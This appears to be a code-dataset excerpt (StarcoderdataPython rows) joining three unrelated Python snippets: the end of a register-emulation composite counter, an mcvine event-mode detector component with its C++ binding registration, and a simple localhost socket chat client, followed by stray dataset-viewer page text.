        The composite count ``h`` (also printed, as before).
    """
    b0 = seed * 100 + 100000      # first value of register b
    last = b0 + 17000             # register c: final value, inclusive
    h = 0                         # composite counter (register h)
    for b in range(b0, last + 1, 17):
        composite = False
        k = 2
        # Trial division. Fix: the original used `k * k < b`, which never
        # tests k when b == k*k, so squares of primes were misclassified
        # as prime; `<=` closes that off-by-one.
        while k * k <= b:
            if b % k == 0:
                composite = True
                break
            k += 1
        if composite:
            h += 1
    print(h)
    return h


emulate()
| StarcoderdataPython |
3301873 | <reponame>mcvine/mcvine
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# <NAME>
# California Institute of Technology
# (C) 2007 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
class EventModeMCA:
    """Event-mode multi-channel analyzer component.

    Parameters
    ----------
    outfilename : str
        Output data file name.
    detectorDims : sequence of int
        Dimensions of the detector system. For example, 100 packs with
        8 tubes per pack and 100 pixels per tube is ``(100, 8, 100)``.
    """

    def __init__(self, outfilename, detectorDims):
        self.outfilename = outfilename
        self.detectorDims = detectorDims

    def identify(self, visitor):
        """Visitor-pattern dispatch: route to ``visitor.onEventModeMCA``."""
        return visitor.onEventModeMCA(self)
# 2. the handler to construct c++ engine
def onEventModeMCA(self, mca):
    """Visitor handler: build the computation-engine counterpart of *mca*.

    ``self`` is the visiting renderer (it carries ``factory``), not an
    EventModeMCA — this function is registered as a method elsewhere.
    """
    return self.factory.eventmodemca( mca.outfilename, mca.detectorDims )
def bp_eventmodemca( self, outfilename, detectorDims ):
    """boost.python binding factory for EventModeMCA.

    Converts the Python dimension sequence into the binding's
    ``vector_uint`` before constructing the C++ engine object.
    """
    import mccomponents.mccomponentsbp as b
    dims = b.vector_uint( 0 )
    for dim in detectorDims: dims.append(dim)
    return b.EventModeMCA( outfilename, dims )
# 4. register the new class and handlers
import mccomponents.homogeneous_scatterer as mh
# Map EventModeMCA to its engine-construction handler and its
# boost.python binding factory in the scatterer registry.
mh.register(EventModeMCA, onEventModeMCA,
            {'BoostPythonBinding': bp_eventmodemca})
# version
__id__ = "$Id$"
# End of file
| StarcoderdataPython |
3220431 | <reponame>li195111/PyChat
import socket

# Chat server endpoint.
HOST = "localhost"
PORT = 9999


def main():
    """Connect to the chat server and relay console messages until either
    side sends 'quit' (or the user hits Ctrl-C)."""
    # Context manager guarantees the socket is closed on every exit path
    # (the original leaked it on an unhandled exception).
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client:
        # Fix: the original hard-coded ("localhost", 9999) here, ignoring
        # the HOST/PORT constants it had just defined.
        client.connect((HOST, PORT))
        print(f"Start Connect ... {HOST}:{PORT}")
        done = False
        while not done:
            try:
                msg_send = input("Message: ")
                client.send(msg_send.encode('utf-8'))
                if msg_send == 'quit':
                    done = True
                msg = client.recv(1024).decode('utf-8')
                if msg and msg != 'quit':
                    print(f"Received: {msg}")
                else:
                    # Empty reply (peer closed) or explicit 'quit': tell the
                    # server we are done and stop.
                    client.send('quit'.encode('utf-8'))
                    done = True
            except KeyboardInterrupt:
                done = True


if __name__ == "__main__":
    main()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.